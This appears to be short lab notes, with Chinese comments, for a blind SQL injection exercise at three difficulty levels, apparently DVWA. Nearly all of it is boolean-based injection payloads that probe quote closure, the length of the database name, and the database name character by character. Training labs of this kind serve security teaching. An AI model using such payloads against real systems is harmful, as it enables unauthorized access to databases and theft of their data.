SQL Injection (Blind)
low
# 确定闭合
payload: 1' #
# 确定数据库名长度
payload: 1' and length(database())=4 #
# 爆库、爆表、爆字段
payload: 1' and substr(database(),1,1)='d' #
medium
# 确定显示列数
payload: id=1&Submit=Submit
# 确定数据库名长度
payload: id=1 and length(database())=4 &Submit=Submit
# 爆库、爆表、爆字段
payload: id=1 and substr(database(),1,1)='d'&Submit=Submit
high
# 确定闭合
payload: 1' #
# 确定数据库名长度
payload: 1' and length(database())=4 #
# 爆库、爆表、爆字段
payload: 1' and substr(database(),1,1)='d' #